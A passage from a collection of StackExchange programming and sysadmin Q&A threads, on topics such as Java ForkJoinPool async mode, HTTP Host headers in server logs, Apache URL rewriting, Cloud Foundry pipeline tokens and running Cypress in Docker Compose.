1}]\nNIntegrate[f[Cos[t], Sin[t]], {t, 0, Pi\/2}]\n<\/code>\nall yield 0.168183 (and same analytic result).\nOr else consider,$\\int_C y ds$ for the same $C$ with same parametrizations:\n<code>Integrate[1, {t, 0, 1}]\nIntegrate[t\/Sqrt[1 - t^2], {t, 0, 1}]\nIntegrate[Sin[t], {t, 0, Pi\/2}]\n<\/code>\nall yield 1.\nComment: Replace `t` by `1-t`.\nComment: Thanks for the nice answer, but I still see a problem. The parametrization $(x,y)\\to (t,\\sqrt{1-t^2})$ as $0\\le t\\le 1$ does not trace the quarter unit-circle from (0,1) to (1,0). 
Rather, it traces the unit circle from (0,1) to (1,0), so it is not the correct parametrization for this problem.\nComment: @murray Yep, that's what I did too.\nAnswer: <code>Integrate<\/code> supports <code>Region<\/code> primitives, so you can use:\n<code>Integrate[(x y)\/(1 + x + 2 y), {x, y} \u2208 Circle[{0, 0}, 1, {0, \u03c0\/2}]]\n<\/code>\n\n1\/25 (15 - 2 \u03c0 + Log[8] - 3 Log[9])\n\nNumerical approximation:\n<code>N @ %\n<\/code>\n\n0.168183\n","meta":{"source":"mathematica.stackexchange","title":"Line Integral Difficulty","dup_signals":{}},"subset":"stackexchange"} +{"text":"What is ForkJoinPool Async mode\n\nQuestion: What does Async mode of ForkJoinPool mean? Javadoc mentions that it makes queues (is it per-thread queue?) FIFO instead of LIFO. What does it mean in practice?\nAnswer: Each worker thread in a <code>ForkJoinPool<\/code> has its own work queue. Async mode concerns the order in which each worker takes forked tasks that are never joined from its work queue.\nWorkers in a <code>ForkJoinPool<\/code> in async mode process such tasks in FIFO (first in, first out) order. By default, <code>ForkJoinPool<\/code>s process such tasks in LIFO (last in, first out) order.\nIt's important to emphasise that the async mode setting only concerns forked tasks that are never joined. When using a <code>ForkJoinPool<\/code> for what it was originally designed for, namely recursive fork\/join task decomposition, <code>asyncMode<\/code> doesn't come into play at all. Only when a worker is not engaged in actual fork\/join processing does it execute async tasks, and only then is the <code>asyncMode<\/code> flag actually queried.\nHere's a small program that demonstrates the difference between the two different async mode settings:\n<code>import java.util.concurrent.*;\nimport java.util.concurrent.atomic.AtomicInteger;\n\n\/**\n * Demo of {@code ForkJoinPool} behaviour in async and non-async mode.\n *\/\npublic class ForkJoinAsyncMode {\n public static void main(String[] args) {\n \/\/ Set the asyncMode argument below to true or false as desired:\n ForkJoinPool pool = new ForkJoinPool(\n 4, ForkJoinPool.defaultForkJoinWorkerThreadFactory, null, true);\n\n pool.invoke(new RecursiveRangeAction(0, 200));\n pool.awaitQuiescence(2L, TimeUnit.SECONDS);\n }\n\n \/**\n * A {@code ForkJoinTask} that prints a range if the range is smaller than a\n * certain threshold; otherwise halves the range and proceeds recursively.\n * Every recursive invocation also forks off a task that is never joined.\n *\/\n private static class RecursiveRangeAction extends RecursiveAction {\n private static final AtomicInteger ASYNC_TASK_ID = new AtomicInteger();\n\n private final int start;\n private final int end;\n\n RecursiveRangeAction(int start, int end) {\n this.start = start;\n this.end = end;\n }\n\n @Override\n protected void compute() {\n if (end - start < 10) {\n System.out.format(\"%s range [%d-%d] done%n\",\n Thread.currentThread().getName(), start, end);\n } else {\n int mid = (start + end) >>> 1;\n int id = ASYNC_TASK_ID.incrementAndGet();\n\n System.out.format(\n \"%1$s [%2$d-%3$d] -< [%3$d-%4$d], fork async task %5$d%n\",\n Thread.currentThread().getName(), start, mid, end, id);\n\n \/\/ Fork off additional asynchronous task that is never joined.\n ForkJoinTask.adapt(() -> {\n System.out.format(\"%s async task %d done%n\",\n Thread.currentThread().getName(), id);\n }).fork();\n\n invokeAll(new RecursiveRangeAction(start, mid),\n new RecursiveRangeAction(mid, end));\n }\n }\n }\n}\n<\/code>\nIn non-async 
mode (the default for <code>ForkJoinPool<\/code>), forked tasks that are never joined are executed in LIFO order.\nWhen you run the example program in non-async mode, looking at the output of one worker you might see a pattern like the following:\n<code>ForkJoinPool-1-worker-0 [175-187] -< [187-200], fork async task 10\nForkJoinPool-1-worker-0 [175-181] -< [181-187], fork async task 11\nForkJoinPool-1-worker-0 range [175-181] done\nForkJoinPool-1-worker-0 range [181-187] done\nForkJoinPool-1-worker-0 [187-193] -< [193-200], fork async task 12\nForkJoinPool-1-worker-0 range [187-193] done\nForkJoinPool-1-worker-0 range [193-200] done\nForkJoinPool-1-worker-0 async task 12 done\nForkJoinPool-1-worker-0 async task 11 done\nForkJoinPool-1-worker-0 async task 10 done\n<\/code>\nHere, tasks 10, 11, 12 are forked and later executed in reverse order once the worker gets around to executing them.\nIn async mode on the other hand, again looking at the output of one worker the pattern would rather look like the following:\n<code>ForkJoinPool-1-worker-3 [150-175] -< [175-200], fork async task 8\nForkJoinPool-1-worker-3 [150-162] -< [162-175], fork async task 9\nForkJoinPool-1-worker-3 [150-156] -< [156-162], fork async task 10\nForkJoinPool-1-worker-3 range [150-156] done\nForkJoinPool-1-worker-3 range [156-162] done\nForkJoinPool-1-worker-3 [162-168] -< [168-175], fork async task 11\n...\nForkJoinPool-1-worker-3 async task 8 done\nForkJoinPool-1-worker-3 async task 9 done\nForkJoinPool-1-worker-3 async task 10 done\nForkJoinPool-1-worker-3 async task 11 done\n<\/code>\nTasks 8, 9, 10, 11 are forked and later executed in the order they were submitted.\nWhen to use which mode? Whenever a <code>ForkJoinPool<\/code> thread pool is chosen to take advantage of its work-stealing properties rather than for recursive fork\/join task processing, async mode is probably the more natural choice, as tasks get executed in the order they are submitted.\nAsync event-driven frameworks like <code>CompletableFuture<\/code> are sometimes said to profit from async mode. For example, when constructing a complex chain of <code>CompletableFuture<\/code> callbacks, then a custom <code>ForkJoinPool<\/code> executor in async mode might perform slightly better than the default executor. (I can't speak from experience though.)\nComment: What's the purpose though? Latency? Making it more CPU-friendly somehow?\nComment: In order to utilize the asyncMode, I would recommend using `Executors.newWorkStealingPool()`. Your custom ForkJoinPool implementation is same as the work-stealing ExecutorService, with just a change in the parallelism count. My General Rule of Thumb for LIFO: ForkJoinPool's commonPool, for FIFO: work-stealing ExecutorService.\nAnswer: It is meant for event-style tasks that are submitted but never joined.\nSo basically tasks that are getting executed for their side-effects, not for returning a result that will be processed by the forking task after joining.\n","meta":{"source":"stackoverflow","title":"What is ForkJoinPool Async mode","dup_signals":{}},"subset":"stackexchange"} +{"text":"http requests from server itself\n\nQuestion: I am running a website on AWS EC2 instance. I am logging http requests headers. When I checked the logs, I noticed that there are many requests from the AWS EC2 instance public ip. 
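A short hedged sketch of the <code>CompletableFuture</code> case mentioned in the ForkJoinPool discussion above, i.e. handing an async-mode pool to the <code>*Async</code> methods (pool size and the work itself are arbitrary):
<code>
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.ForkJoinPool;

public class AsyncModeWithFutures {
    public static void main(String[] args) {
        // asyncMode = true: locally queued, never-joined tasks run in FIFO order
        ForkJoinPool pool = new ForkJoinPool(
                4, ForkJoinPool.defaultForkJoinWorkerThreadFactory, null, true);

        CompletableFuture<Integer> result =
                CompletableFuture.supplyAsync(() -> 21, pool)        // runs on the custom pool
                                 .thenApplyAsync(x -> x * 2, pool);  // continuation on the same pool

        System.out.println(result.join());   // 42
        pool.shutdown();
    }
}
<\/code>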
\nExample:-\n\nAWS EC2 public ip : 188.8.131.52\n\n<code>{\"headers\":{\"host\":\"184.108.40.206:80\"}}\n<\/code>\nIs it possible to have server sending http request to itself for viewing web pages?\nI am logging each request and the url they are requested.\nI tested and logged the files locally by creating a local server but there were no requests from server to itself or something like this. \nI am new here, help me with some explanation. Is it a security threat? If it is, How it can be resolved?\nAnswer: That is not the source IP of the request, it's the value of what the user agent set in the <code>Host<\/code> header.\nWhen I make a HTTP request to StackExchange to fetch this question page, it looks like this:\n<code>GET \/questions\/169836\/http-requests-from-server-itself HTTP\/1.1\nHost: security.stackexchange.com\n...\n<\/code>\nThe <code>Host<\/code> header indicates that I wish to load from the <code>security.stackexchange.com<\/code> host, and is usually automatically filled by my browser when I make a request. It knows the host because it's in the full URL I'm visiting.\nThe header allows one server to host multiple sites on multiple domains via virtual hosting. One HTTP server on one IP address can host multiple sites with different domain names (each pointing to the same IP via DNS) differentiated by the content of the <code>Host<\/code> header sent by the user agent (e.g. a browser).\nWhat you're seeing is either requests someone made manually by going to <code>http:\/\/18.104.22.168<\/code> or requests made by automated systems that scan the internet. In the case of the latter, they likely scan by IP space only and do not know the correct hostname for the system, so simply provide a <code>Host<\/code> header with the IP address in.\nIn summary: these requests are not being made from your own webserver, and I would not say this is a security concern.\nComment: oh thnx alot.. 1 more question if you can help... Sometimes i even have empty headers ... like Headers:{} and sometimes there are no host or user-agent property...sometimes just \"accept\" property... is it safe too? Any way i can check the source of the request?\nComment: @HimanshuBansal Chances are these are just random bits of traffic from the internet from various indexers, scanners, etc. The internet is a noisy place. If you're concerned, consider setting up mod_security or whatever the equivalent WAF is for your server application.\nComment: Thnx i'll look into it.\n","meta":{"source":"security.stackexchange","title":"http requests from server itself","dup_signals":{}},"subset":"stackexchange"} +{"text":"Local DNS in a standard DHCP LAN\n\nQuestion: Our customers are typical broadband home users, with a DSL Modem\/Router which offers DHCP.\nWe want our device which is connected to the home LAN and has an embedded HTTP Server to be addressable with a domain name (www.mydevice.ip or something). In particular, we want to avoid that the user has to get the IP address and type it into the address bar of his browser.\nWhat solutions are available? \nHas the typical DHCP Modem a DNS included - how do you use it?\nCould other services offer help (eg. 
Bonjour)?\nAnswer: You can use mDNS\/DNS-SD using \"avahi\" daemon -- this should work on mac + linux hosts, and maybe for windows.\nFor Windows, you can set up SAMBA to get WINS name resolution.\nAnswer: A \"typical DHCP Modem\" is no standard so there is no default answer.\nWhat you want, is that the modem works as a DNS cache (which is pretty much the default) and additionally add your own, static DNS entries that point to the IP of the entry.\nHow you achieve that depends on the router...\n","meta":{"source":"stackoverflow","title":"Local DNS in a standard DHCP LAN","dup_signals":{}},"subset":"stackexchange"} +{"text":"Query table by filtering criteria from rows\n\nQuestion: Need help with querying in c# with entity framework. \nI have an advanced search page where I can select multiple options from a checkbox list. These selected options should be filtered from a table which has each option as a value. \n\nThis is the snapshot of my table.\n\nFrom this table, my select options are below:\n\nIf I select more than one of them, I need to retrieve the data which holds for all the values checked. i.e., I should apply an \"AND\" condition with the selected values to get the employee who has all the selected values. The below code wouldnt apply the filter as an \"AND\" operation because I am comparing each item individually with the list of rows. \n<code>foreach (var item in UIFilter.SecurityOptions)\n {\n securityOverrideList.AddRange(\n secureDbContext.\n SecurityOverride.\n Where(p => p.SECURITY_ROLE_CD.Equals(item)).\n Select(p => p.EMPL_ID));\n }\n<\/code>\nCan someone suggest me a way to do this in C# as I am not having access to create procedures in my DB right now. \nComment: why you need a `foreach` loop here?\nAnswer: Could you probably try the following:\n<code>var potentialEmployees = secureDbContext.SecurityOverride.Where(a => UIFilter.SecurityOptions.Contains(a.SECURITY_ROLE_CD));\nvar securityOverrideList = potentialEmployees.Select(x => x.EMPL_ID).Distinct();\nforeach (var item in UIFilter.SecurityOptions)\n{\n var subsetEmployeeIds = potentialEmployees.Where(a => a.SECURITY_ROLE_CD == item).Select(x => x.EMPL_ID);\n securityOverrideList = securityOverrideList.Where(a => subsetEmployeeIds.Contains(a));\n}\n<\/code>\nLooking at your structure, there would be no single row that would meet all of the selected roles. As such, we need to get all potential employeeId (assuming this is what you are looking for as you are projecting only the employee id). \nNext, we loop through again for each security role to ensure that the securityOverrideList becomes smaller as it needs to meet all of those criteria.\n","meta":{"source":"stackoverflow","title":"Query table by filtering criteria from rows","dup_signals":{}},"subset":"stackexchange"} +{"text":"URL rewriting variable name\n\nQuestion: I am trying to rewrite an URL so that a passed variable is replaced with a new id, for example;\n<code>wwww.domain.com\/default.php?s=1&lang=en<\/code>\nTo be rewritten to:\n<code>www.domain.com\/default.php?id=1$lang=en<\/code>\nThe s variable being replaced with id\nI have tried:\n<code>RewriteEngine on\nOptions +FollowSymlinks\nRewriteBase \/\nRewriteCond %{QUERY_STRING} ^s=(.+)$\nRewriteRule ^s=(.+)$ id=$1 [R,NC,L]\n<\/code>\nalso\n<code>RewriteRule ^s=(.+)$ id=%1 [R,NC,L]\n<\/code>\nno luck... what am I doing wrong?\nThanks for any help!!\nAnswer: This should work if even if you don't have <code>s<\/code> as the first variable. 
(Not sure what you really want.)\n<code>Options +FollowSymlinks\nRewriteEngine On\nRewriteCond %{QUERY_STRING} ^(.*&)*s=(.*)(&*)$\nRewriteRule ^default.php$ default.php?%1&id=%2%3\n<\/code>\nComment: Almost -- right now it's way too broad as it will also match `\/default.php?yes=123&lang=en`\nAnswer: Try this out:\n<code>RewriteRule ^default.php?s=([0-9]+)&lang=en$ default.php?id=$1&lang=en\n<\/code>\nEdit.\nA more generic version.\n<code>RewriteRule ([^?]+)?s=([0-9]+)&lang=([A-z]{2})$ $1?id=$2&lang=$3\n<\/code>\nComment: RewriteRule does not work with query string like that -- only with help of RewriteCond. Therefore this rule is completely useless in Apache\nComment: LazyOne - I always use it in this way, I know it isn't the best way. It should work though, at least the first one should.\nComment: You see -- RewriteRule pattern only matches **path part** of the URL -- query string has to be matched via RewriteCond. I have NEVER seen it working in this way (unless you have some unknown-to-me-yet extra module installed\/enabled that allows such behaviour). I was debugging quite a lot of rewrite rules (where Apache gives detailed info on what data it is working with right now) and I can clearly see that query string matching has to be done separately.\n","meta":{"source":"stackoverflow","title":"URL rewriting variable name","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to retrieve the cloud foundry oauth token from a devops deploy stage for setting up auto scaling?\n\nQuestion: I'm trying to get the cloud foundry oauth-token from a devops pipeline deploy stage:\n<code>...\ncf push $CF_APP\n...\n\naccessToken=$(cf oauth-token | grep bearer | sed -e s\/bearer\/Bearer\/g)\necho accessToken=$accessToken\n...\n# use token in Auto Scaling API call ...\ncurl $createPolicyUrl -X 'PUT' -H 'Content-Type:application\/json' \\\n -H 'Accept:application\/json' \\\n -H \"Authorization:$accessToken\" \\\n --data-binary @${policyJson} \\\n -s -o response.txt -w '%{http_code}\\n'\n<\/code>\nThe output from the echo command is:\n<code>accessToken=\n<\/code>\nHow can I retrieve the oauth token?\nNote that <code>cf push<\/code> works ok in the script even though there isn't a <code>cf login<\/code> performed in the deploy script. Therefore, I'm assuming cf oauth-token would not need login either. Is this a valid assumption?\nUpdate: I added <code>cf login<\/code> to my deploy script:\n<code>...\ncf push $CF_APP\n...\n\ncf login\naccessToken=$(cf oauth-token | grep bearer | sed -e s\/bearer\/Bearer\/g)\necho accessToken=$accessToken\n...\n<\/code>\nThe output:\n<code>cf login not allowed.\n<\/code>\nSee also my similar question on reconfiguring availability monitoring in a devops deploy stage.\nComment: I'm assuming you're using the bluemix cli? You can login via `bx login` and then run `bx cf oauth-token`. I think that should get you what you want\nAnswer: Make sure to do a <code>cf login<\/code> to log in before you run the <code>cf oauth-token<\/code> command. Also make sure to double quote <code>\"Authorization:$accessToken\"<\/code> so the variable is substituted. \nUpdate: It looks like you can access the oauth-token from within the script via the <code>$CF_TOKEN<\/code> environment variable. The token is associated with the owner of the pipeline, not the user running the current pipeline stage.\nComment: Unfortunately, `cf login` is not allowed. 
I've updated the question to reflect this.\nComment: Yes, in Delivery Pipeline it's best to use the `$CF_TOKEN`\nAnswer: Can you try\n<code>accessToken=$(cf oauth-token)\nCF_TOKEN=$(echo $accessToken | grep \"Bearer*\" | perl -wpe 's\/.*(Bearer .+)\/$1\/')\nCF_TOKEN should now have the token value\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to retrieve the cloud foundry oauth token from a devops deploy stage for setting up auto scaling?","dup_signals":{}},"subset":"stackexchange"} +{"text":"\"no control matching name\" in mechanize for python\n\nQuestion: I am using mechanize for python and I am trying to search for an item in kijiji. Eventually my goal is for my program to search for an item, and using beautifulsoup, check whether or not someone has posted a new ad for my search term by scraping through the html source that comes from inputting a search term and e-mailing me if any new ads show up so that I can be the first one to respond. Below is my code, but I get an error:\"no control matching name 'keywords\". I am not sure what I am doing wrong. \n<code>import mechanize\nbr = mechanize.Browser() # allow everything to be written to\nbr.set_handle_robots(False) # ignore robots\nbr.open(\"http:\/\/www.kijiji.ca\/h-kitchener-waterloo\")\nbr.select_form(nr=0)\nbr[\"keywords\"] = \"Nvidia\"\n<\/code>\nAnswer: Your code is OK but there is no form named 'keywords' in the page. You can look into page source info to verify that.\nComment: I am looking to input data for the search box, which has a name of \"keywords\". The code should be br[\"keywords\"] = \"Nvidia\", but that doesn't work either. If you right click on the search box and click \"Inspect Element\" you will see what I mean.\nAnswer: Although this specific error I could not solve, I discovered an alternative way to tackling my ultimate goal which is to scrape a website and inform me of any changes. You can do this by changing the keyword found in the url(example:\"kijiji.ca\/monitor\/kitchener-waterloo) to whatever product you are searching for, and then downloading the html source for that url on a timed basis and checking if the code matches the previous. If it doesn't, send an e-mail because you know a new ad has been posted.\n","meta":{"source":"stackoverflow","title":"\"no control matching name\" in mechanize for python","dup_signals":{}},"subset":"stackexchange"} +{"text":"Return different ManyToMany objects based on param using Django and DRF\n\nQuestion: I'm trying to figure out if what's the best way to implement this behavior:\nI have an object of type \"Recipe\", whose related model \"IngredientRecipe\" is obtained from a list of \"Products\" with information about its \"Supplier\". A recipe may have \"beef\" as an ingredient and this ingredient is supplied by several suppliers. What I want to obtain is a recipe whose list of ingredients corresponds to the ingredients supplied by the suppliers of the selected location.\nFor example:\nhttps:\/\/api.url\/recipes\/34\/?location=1\nThis would return the detail of the recipe with id=34 and the list of ingredients but from the location with id=1. 
That is, the price of the ingredient \"beef\" will be the one corresponding to the supplier of the location id=1.\nmodels.py:\n<code>class Recipe(models.Model):\n    user = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name='user_recipes')\n    title = models.CharField(_('Recipe title'), max_length=255, blank=True)\n\nclass IngredientRecipe(models.Model):\n    product = models.ForeignKey(Product, on_delete=models.CASCADE, related_name='products')\n    recipe = models.ForeignKey(Recipe, on_delete=models.CASCADE, related_name='ingredients')\n    quantity = models.FloatField(_('Quantity'))\n\nclass Product(models.Model):\n    name = models.CharField(_('Name'), max_length=255)\n    price = models.FloatField(_('Sale price'), default=0)\n    supplier = models.ForeignKey(Supplier, blank=True, null=True, related_name='supplier_products',\n                                 on_delete=models.CASCADE)\n\nclass Supplier(models.Model):\n    name = models.CharField(_('Name'), max_length=255)\n    location = models.ForeignKey(Location, on_delete=models.CASCADE)\n<\/code>\nRight now I'm using ModelViewSets and ModelSerializers to render saving my objects.\nThank you very much in advance.\nAnswer: You can use the <code>related_name='ingredients'<\/code> on the recipe field of <code>IngredientRecipe<\/code>:\n<code>def your_view_name(request, recipie_id):\n    data = request.query_params  # take the location id query parameter\n    data._mutable = True  # dictionary from frontend immutable sometimes\n    location_id = data.get('location')\n    recipie_list = Recipe.objects.filter(ingredients__product__supplier__location__id=location_id)  # will get the recipie queryset based on the location.\n<\/code>\n","meta":{"source":"stackoverflow","title":"Return different ManyToMany objects based on param using Django and DRF","dup_signals":{}},"subset":"stackexchange"} +{"text":"System.AccessViolationException\n\nQuestion: I am using a COM DLL in the following manner:\n<code>#Region \"API Function\"\n    <DllImportAttribute(\"abc.dll\", EntryPoint:=\"optcntl\")> _\n    Public Shared Function optcntl(ByRef pBlocks As blocks) As Integer\n    End Function\n#End Region\n<\/code>\nThis DLL uses four other DLLs to complete its processing. If I change the current directory path from the \/bin\/ folder to another folder on the C or D drive which contains all the DLLs, I get the following error message: \nSystem.AccessViolationException: Attempted to read or write protected memory. \nThis is often an indication that other memory is corrupt\nAny help would be appreciated.\nAnswer: If I understand it correctly, this errors out whenever you change the current directory path to one NOT containing the four dlls that abc.dll calls. If so, it may be that abc.dll is always looking in the current directory path for the other four dlls rather than the application directory or some specific place. However, this would normally give you a different error message, so make sure that there is not an old bug-ridden copy of the four dlls on the hard drive that is inadvertently being picked up when you change the current directory.\nComment: Thanks a lot for your reply, I put all DLLs in that particular folder which are used by abc.dll.\n","meta":{"source":"stackoverflow","title":"System.AccessViolationException","dup_signals":{}},"subset":"stackexchange"} +{"text":"Ubuntu 16.04 Can't connect with FTP, only SFTP\n\nQuestion: I'm currently running an Ubuntu 16.04 VPS to host my website and files. 
My default (S)FTP port is 22, but when I use SFTP, it takes literal hours to upload files.\n\nI have a 30mb\/s upload speed.\nWith uploading, uploads can go as slow as 5kb\/s.\n\nNow are my files not very special, so I'm not in the need of an encrypted connection (just trust me here). And I know for a fact, that my uploads with FTP can cap out at the max. 30mbs\/sec.\nBut when I tried to open FTP port 21 on my server (no errors thrown) for both tcp \/ udp, my FTP Client (WinSCP) refuses to connect. Does anybody know what can cause this? or a simple fix for the slow sftp connection?\nI'm pretty new at this, so thanks for the help!\nComment: if you have been able to upload at over 30mbs\/sec, with FTP... how is FTP not working?\nComment: By `mb\/s` do you mean `megabits per second` or `megabytes per second`? Usually 'upload speeds' are in megabits.\nComment: @Thomas Ward in megabytes in this case. but that doesn't matter for the question, because sftp is stil underperforming. and i cant get to ftp\nComment: Did you install a FTP server?\nComment: @thim24 you need to install an FTP server for FTP to work - it doesn't come available 'out of the box'. As for 'slow connection', where's the server related to you? If it's a good distance away then your speed *will* be impacted, even if it's FTP. Also, FTP is **insecure** so you really should avoid using it.\nAnswer: ftp uses more than one port - control and data port...\nControl port - 21\nData port - 20\nOpen port 20, as you have done 21.\nComment: stil didnt fix it sadly. connecting with either port 20 or 21 threw the same connection refused error\nComment: what did you do to open the port? Can you post the output of `ss -tuln`... and it may just be semantics here, but it's not \"either\" port, FTP uses both ports.\nComment: connection refused means there's no FTP server listening on those ports. Did you install an FTP server software?\n","meta":{"source":"askubuntu","title":"Ubuntu 16.04 Can't connect with FTP, only SFTP","dup_signals":{}},"subset":"stackexchange"} +{"text":"Cypress could not verify that this server is running when using Docker and Docker Compose\n\nQuestion: I currently have three docker containers running:\n\nDocker container for the front-end web app (exposed on port 8080)\nDocker container for the back-end server (exposed on port 5000)\nDocker container for my MongoDB database.\n\nAll three containers are working perfectly and when I visit http:\/\/localhost:8080, I can interact with my web application with no issues.\nI'm trying to set up a fourth Cypress container that will run my end to end tests for my app. 
Unfortunately, this Cypress container throws the below error, when it attempts to run my Cypress tests:\n<code>cypress | Cypress could not verify that this server is running:\ncypress |\ncypress | > http:\/\/localhost:8080\ncypress |\ncypress | We are verifying this server because it has been configured as your `baseUrl`.\ncypress |\ncypress | Cypress automatically waits until your server is accessible before running tests.\ncypress |\ncypress | We will try connecting to it 3 more times...\ncypress | We will try connecting to it 2 more times...\ncypress | We will try connecting to it 1 more time...\ncypress |\ncypress | Cypress failed to verify that your server is running.\ncypress |\ncypress | Please start this server and then run Cypress again.\n<\/code>\nFirst potential issue (which I've fixed)\nThe first potential issue is described by this SO post, which is that when Cypress starts, my application is not ready to start responding to requests. However, in my Cypress Dockerfile, I'm currently sleeping for 10 seconds before I run my cypress command as shown below. These 10 seconds are more than adequate since I'm able to access my web app from the web browser before the <code>npm run cypress-run-chrome<\/code> command executes. I understand that the Cypress documentation has some fancier solutions for waiting on http:\/\/localhost:8080 but for now, I know for sure that my app is ready for Cypress to start executing tests.\n<code>ENTRYPOINT sleep 10; npm run cypress-run-chrome\n<\/code>\nSecond potential issue (which I've fixed)\nThe second potential issue is described by this SO post, which is that the Docker container's <code>\/etc\/hosts<\/code> file does not contain the following line. I've also rectified that issue and it doesn't seem to be the problem.\n<code>127.0.0.1 localhost\n<\/code>\nDoes anyone know why my Cypress Docker container can't seem to connect to my web app that I can reach from my web browser on http:\/\/localhost:8080?\nBelow is my Dockerfile for my Cypress container\nAs mentioned by the Cypress documentation about Docker, the cypress\/included image already has an existing entrypoint. Since I want to sleep for 10 seconds before running my own Cypress command specified in my package.json file, I've overridden ENTRYPOINT in my Dockerfile as shown below.\n<code>FROM cypress\/included:3.4.1\n\nCOPY hosts \/etc\/\n\nWORKDIR \/e2e\n\nCOPY package*.json .\/\n\nRUN npm install --production\n\nCOPY . 
.\n\nENTRYPOINT sleep 10; npm run cypress-run-chrome\n<\/code>\nBelow is the command within my package.json file that corresponds to <code>npm run cypress-run-chrome<\/code>.\n<code>\"cypress-run-chrome\": \"NODE_ENV=test $(npm bin)\/cypress run --config video=false --browser chrome\",\n<\/code>\nBelow is my docker-compose.yml file that coordinates all 4 containers.\n<code>version: '3'\nservices:\n web:\n build:\n context: .\n dockerfile: .\/docker\/web\/Dockerfile\n container_name: web\n restart: unless-stopped\n ports:\n - \"8080:8080\"\n volumes:\n - .:\/home\/node\/app\n - node_modules:\/home\/node\/app\/node_modules\n depends_on:\n - server\n environment:\n - NODE_ENV=testing\n networks:\n - app-network\n\n db:\n build:\n context: .\n dockerfile: .\/docker\/db\/Dockerfile\n container_name: db\n restart: unless-stopped\n volumes: \n - dbdata:\/data\/db\n ports:\n - \"27017:27017\"\n networks:\n - app-network\n\n server:\n build:\n context: .\n dockerfile: .\/docker\/server\/Dockerfile\n container_name: server\n restart: unless-stopped\n ports:\n - \"5000:5000\"\n volumes:\n - .:\/home\/node\/app\n - node_modules:\/home\/node\/app\/node_modules\n networks:\n - app-network\n depends_on:\n - db\n command: .\/wait-for.sh db:27017 -- nodemon -L server.js\n\n cypress:\n build:\n context: .\n dockerfile: Dockerfile\n container_name: cypress\n restart: unless-stopped\n volumes:\n - .:\/e2e\n depends_on:\n - web\n networks:\n - app-network\n\nnetworks:\n app-network:\n driver: bridge\n\nvolumes:\n dbdata:\n node_modules:\n<\/code>\nBelow is what my hosts file looks like which is copied into the Cypress Docker container.\n<code>127.0.0.1 localhost\n<\/code>\nBelow is what my cypress.json file looks like.\n<code>{\n \"baseUrl\": \"http:\/\/localhost:8080\",\n \"integrationFolder\": \"cypress\/integration\",\n \"fileServerFolder\": \"dist\",\n \"viewportWidth\": 1200,\n \"viewportHeight\": 1000,\n \"chromeWebSecurity\": false,\n \"projectId\": \"3orb3g\"\n}\n<\/code>\nComment: `localhost` in Docker is always \"this container\". You can use the names of the service blocks in the `docker-compose.yml` as hostnames; `http:\/\/web:8080`.\nComment: @DavidMaze Yep, this was absolutely the problem. If you write up that as the solution I'm happy to accept it as the answer. I would imagine this question and solution would be helpful to other Docker newbies like myself.\nComment: THAT, i did not see this in the docs somewhere\nAnswer: <code>localhost<\/code> in Docker is always \"this container\". Use the names of the service blocks in the docker-compose.yml as hostnames, i.e., http:\/\/web:8080\n(Note that I copied David Maze's answer from the comments)\nComment: Life saver, thank you! It took me days to find your answer, I wonder how it was hidden so well. I am thinking to go back to all the SO questions I reviewed and place a link to this...\nComment: I am facing the same issue and I understood whats the issue but what is the solution to it? 
What to edit in the docker-compose.yml file so that the local host of cypress points to localhost of web.\nComment: @Chromeium -> Use the names of the service blocks in the docker-compose.yml as hostnames, i.e., http:\/\/web:8080\nComment: cypress container: environment:(newline) - CYPRESS_baseUrl=http:\/\/web\n","meta":{"source":"stackoverflow","title":"Cypress could not verify that this server is running when using Docker and Docker Compose","dup_signals":{}},"subset":"stackexchange"} +{"text":"Elements not displaying correctly in IE\n\nQuestion: I am trying to display a form in IE, but for some reason, the layout is broken as you can see from the picture. I have tried various fixes inc, clears, display:block options, but still the layout breaks. If this was in FF, I could use firebug to trace where it is breaking but IE has no such debug tool, hence the post. I would be grateful if someone could show me my error. Thanks\n<code>.adduserform label\n {\n\n display:block;\n width:130px;\n float:left;\n font-weight:normal;\n font-size:12px;\n padding: 4px 0 0 40px;\n z-index:1000;\n clear:both;\n line-height: 20px;\n\n }\n\n.adduserform select\n {\n\n width: 130px;\n float:left\n font-family:Calibri, Arial, Helvetica, sans-serif;\n font-size:12px;\n outline:none;\n margin-top: 5px;\n clear:both;\n }\n\n <div id=\"coname\">\n <div id=\"AUSR_address\"><\/div>\n <dl>\n <dt>\n <label for=\"AUSR_name\" class=\"opt\">Full Name:<\/label>\n <\/dt>\n <dd>\n <input id=\"AUSR_name\" name=\"AUSR_name\" type=\"text\" size=\"32\" maxlength=\"128\" value = \"\" \/>\n <\/dd>\n <\/dl>\n <\/div>\n<\/code>\n\n+++SOLUTION+++\n<code>div#coname {\n\n clear:both;\n}\n<\/code>\nComment: @martin. oopps..sorry doing it know. thanks\nComment: Some versions of IE do have a similar tool to Firebug, try pressing F12\nComment: @shane I have tried that but found it more of a hindurance than a helpful tool. Every time you try something, just keeps refreshing the browser. What we need is firebug for IE. I know there is a cut down version so may check it out. Thanks\nAnswer: IE has developer toolbar. If you press F12 it should bring it up and should help you find your issue. You can also use it to view your pages in different IE version modes.\nComment: John I am not too familiar with IE Toolbar, apart from the fact it seems to take forever to update itself. How could I use it to help with my issue? Thanks\nComment: It should pretty much the same as firebug. If you use the element selector you can use the attributes section to add styles to your elements so you can preview what Changes look like. With your code I'd be tempted to put your labels and inputs inside a dive each and have a float: left and clear both on the label div.\nAnswer: I would start out by making sure you have a doctype at the top like so:\n<code><!DOCTYPE html>\n<\/code>\nWithout specifying a doctype, IE reverts to quirks mode and things can get a little ugly. An example above is for HTML5, but there are quite a few more. For a full list of possible doctypes, refer here: http:\/\/www.w3.org\/QA\/2002\/04\/valid-dtd-list.html\nIronically, there is a website called http:\/\/www.quirksmode.org\/ which keeps track of various compatibility issues across browsers. 
